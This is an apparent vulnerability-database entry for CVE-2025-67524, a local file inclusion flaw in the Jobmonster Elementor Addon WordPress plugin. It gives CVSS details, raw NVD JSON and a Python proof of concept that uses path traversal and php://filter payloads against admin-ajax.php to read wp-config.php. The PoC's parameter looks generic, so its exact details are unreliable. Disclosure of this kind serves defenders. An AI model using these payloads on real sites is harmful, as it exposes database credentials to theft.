Security Vulnerability Report
中文
CVE-2025-67524 CVSS 7.5 HIGH

CVE-2025-67524

Published: 2025-12-09 16:18:26
Last Modified: 2026-04-27 18:16:41

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in NooTheme Jobmonster Elementor Addon jobmonster-addon allows PHP Local File Inclusion.This issue affects Jobmonster Elementor Addon: from n/a through <= 1.1.4.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Jobmonster Elementor Addon <= 1.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67524 PoC - Jobmonster Elementor Addon LFI # Target: WordPress site with vulnerable Jobmonster Elementor Addon plugin (<=1.1.4) import requests import urllib.parse target = "http://target-site.com" # Read wp-config.php (sensitive configuration file) payload = "../../wp-config.php" params = { "file": payload } print(f"[*] Attempting to read wp-config.php via LFI...") response = requests.get(f"{target}/wp-admin/admin-ajax.php", params=params) if "DB_NAME" in response.text or "define(" in response.text: print("[+] Successfully read wp-config.php!") print(response.text[:500]) else: print("[-] Failed to read file. Trying alternate endpoint...") # Alternative: Try with PHP wrapper to read source payload_b64 = "php://filter/read=convert.base64-encode/resource=../../wp-config.php" params_b64 = { "file": payload_b64 } response_b64 = requests.get(f"{target}/wp-admin/admin-ajax.php", params=params_b64) print(f"[*] Response status: {response_b64.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67524", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:26.013", "lastModified": "2026-04-27T18:16:41.063", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in NooTheme Jobmonster Elementor Addon jobmonster-addon allows PHP Local File Inclusion.This issue affects Jobmonster Elementor Addon: from n/a through <= 1.1.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/jobmonster-addon/vulnerability/wordpress-jobmonster-elementor-addon-plugin-1-1-4-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}